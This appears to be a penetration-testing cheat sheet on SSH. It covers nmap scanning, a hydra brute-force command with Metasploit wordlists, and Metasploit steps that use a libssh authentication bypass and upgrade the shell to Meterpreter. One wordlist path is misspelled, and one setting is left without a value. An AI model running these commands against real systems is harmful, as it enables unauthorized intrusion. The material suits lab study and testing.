SSH

SSH (Secure Shell) is a secure protocol used for remote access and administration of servers and systems. It is the successor to Telnet and provides encryption to protect communication from interception.

By default, SSH runs on TCP port 22, but it can be configured to use any other open TCP port. Authentication in SSH can be set up in two ways:

• Username and password authentication – Requires a valid username and password.

• Key-based authentication – Uses cryptographic key pairs for secure access.

If an SSH server relies on username and password authentication, attackers may attempt a brute-force attack to guess valid credentials and gain unauthorized access to the system.

Techniques

nmap -sV [TARGET IP]

# Bruteforce
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/commomn_passwords.txt [TARGET IP] -t 4 ssh

ssh [USER]@[TARGET_IP]

Exploitation

libssh is a cross-platform C library that implements the SSHv2 protocol for both client and server.

libssh v0.6.0 to v0.8.0 has a vulnerability in the server code, allowing an attacker to bypass authentication and execute commands on the affected server. This poses a significant security risk.

nmap -sS -sV -O [TARGET]

search libssh_auth_bypass
use auxiliary/scanner/ssh/libssh_auth_bypass
set SPAWN_PTY true
sessions

search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
show options
set SESSION
exploit